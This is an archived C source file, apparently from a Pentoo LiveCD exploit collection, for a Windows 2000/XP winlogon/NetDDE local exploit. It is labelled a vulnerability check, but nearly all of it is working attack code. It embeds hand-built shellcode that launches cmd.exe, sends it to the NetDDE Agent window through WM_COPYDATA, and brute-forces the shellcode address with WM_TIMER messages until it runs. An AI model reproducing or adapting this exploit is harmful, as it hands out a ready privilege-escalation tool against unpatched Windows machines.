home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / GetAd2.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  5KB  |  180 lines
  1. /* GedAd2 */
  2. //
  3. /////////// Copyright (c) 2002 Serus ////////////////
  4. //mailto:serus@users.mns.ru
  5. //
  6. //This program check system on winlogon bug present
  7. //Only for Windows 2000 and Windows XP
  8. //This is for check use only!
  9. //
  10.  
  11. #include <windows.h>
  12. #include <stdio.h>
  13.  
  14.  
  15. void main(int argc, char *argv[ ], char *envp[ ] )
  16. {
  17.     char    *buf;
  18.     DWORD    Addr = 0;
  19.     BOOL    bExec = TRUE;
  20.  
  21.     unsigned char sc[] = {    // my simple shellcode, it calls CreateProcess function,
  22.                             // executes cmd.exe on user`s desktop and creates mutex.
  23.         0x8B, 0xF4,
  24.         0x68, 0x53, 0x45, 0x52, 0x00,
  25.         0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
  26.         0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
  27.         0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00,
  28.         0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
  29.         0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69,
  30.         0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,
  31.         0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
  32.         0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08,
  33.         0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
  34.         0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,
  35.         0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
  36.     };
  37.  
  38.     HWND            hWnd;
  39.     COPYDATASTRUCT    cds;
  40.     OSVERSIONINFO    osvi;
  41.     HMODULE            hMod;
  42.     DWORD            ProcAddr;
  43.     HANDLE            hMutex;
  44.     char            mutname[4];
  45.  
  46.     printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ====");
  47.  
  48.     // Get NetDDE Window
  49.     hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
  50.     if(hWnd == NULL)
  51.     {
  52.         MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
  53.         return;
  54.     }
  55.  
  56.     // Get CreateProcessA and CreateMutexA entry addresses
  57.     hMod = GetModuleHandle("kernel32.dll");
  58.     ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");
  59.  
  60.     if(ProcAddr == 0)
  61.     {
  62.         MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
  63.         return;
  64.     }
  65.     *(DWORD *)(sc + 86 + 21) = ProcAddr;
  66.  
  67.     ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
  68.     if(ProcAddr == 0)
  69.     {
  70.         MessageBox(NULL, "Couldn't get CreateMutexA address", "Error", MB_OK | MB_ICONSTOP);
  71.         return;
  72.     }
  73.     *(DWORD *)(sc + 15) = ProcAddr;
  74.  
  75.     //Generate random Mutex name
  76.     srand(GetTickCount());
  77.  
  78.     do
  79.     {
  80.         mutname[0] = 97 + rand()%25;
  81.         mutname[1] = 65 + rand()%25;
  82.         mutname[2] = 65 + rand()%25;
  83.         mutname[3] = 0;
  84.     }
  85.     while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
  86.     memcpy(sc + 3, mutname, 4);
  87.  
  88.     //Form buffer for SendMessage
  89.     buf = (char *)malloc(1000);
  90.     memset(buf, 0xC3, 1000);
  91.     memcpy(buf, sc, sizeof(sc));
  92.  
  93.     cds.cbData = 1000;
  94.     cds.dwData = 0;
  95.     cds.lpData=(PVOID)buf;
  96.  
  97.     //Get OS version
  98.     osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  99.     if(GetVersionEx(&osvi) == 0)
  100.     {
  101.         printf("\nWarning! Couldn't get OS verson. Trying as Win2k.\n");
  102.         osvi.dwMajorVersion = 5;
  103.     }
  104.  
  105.  
  106.     if(osvi.dwMajorVersion != 5)
  107.     {
  108.         MessageBox(NULL, "This program for Win2k and WinXP only!", "Error", MB_OK | MB_ICONSTOP);
  109.         return;
  110.     }
  111.  
  112.     if(osvi.dwMinorVersion == 0)
  113.     {
  114.         //    Windows 2000
  115.  
  116.         printf("\n\nUse Windows 2000 offsets");
  117.  
  118.         //If first login
  119.         //Send shellcode buffer
  120.         SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
  121.         //Try execute it at 0x0080FA78
  122.         PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);
  123.         printf("\nTrying at 0x%X", 0x0080FA78);
  124.  
  125.         //If fails (perhaps not first login)
  126.         //Try to bruteforce shellcode addresss
  127.         for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
  128.         {
  129.             //If mutex exists, shellcode has been executed
  130.             if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
  131.             {
  132.                 //Success
  133.                 printf("\nSuccess!!!\n");
  134.                 printf("\nWarning! You system has vulnerability!\n");
  135.                 CloseHandle(hMutex);
  136.                 return;
  137.             }
  138.             printf("\rTrying at 0x%X", Addr);
  139.  
  140.         SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
  141.         PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
  142.         }
  143.     }
  144.     else
  145.     {
  146.         //    Windows XP
  147.  
  148.         printf("\n\nUse Windows XP offsets\n");
  149.  
  150.         //Try to bruteforce shellcode addresss 0x00{A|B}4FA74 XP SP1
  151.  
  152.         for(Addr = 0x00A0FA74; Addr < 0x01000000; Addr += 0x10000)
  153.         {
  154.             //If mutex exists, shellcode has been executed
  155.             if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
  156.             {
  157.                 //Success
  158.                 printf("\nSuccess!!!\n");
  159.                 printf("\nWarning! You system has vulnerability!\n");
  160.                 CloseHandle(hMutex);
  161.                 return;
  162.             }
  163.             printf("\rTrying at 0x%X", Addr);
  164.  
  165.         SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
  166.         PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
  167.         }
  168.  
  169.     }
  170.  
  171.     //Bug in winlogon not presents
  172.     printf("\n\nBad luck! Try after first logon.\n\n");
  173.  
  174. }
  175.  
  176. /* End GedAd2 */
  177.  
  178.  
  179.  
  180.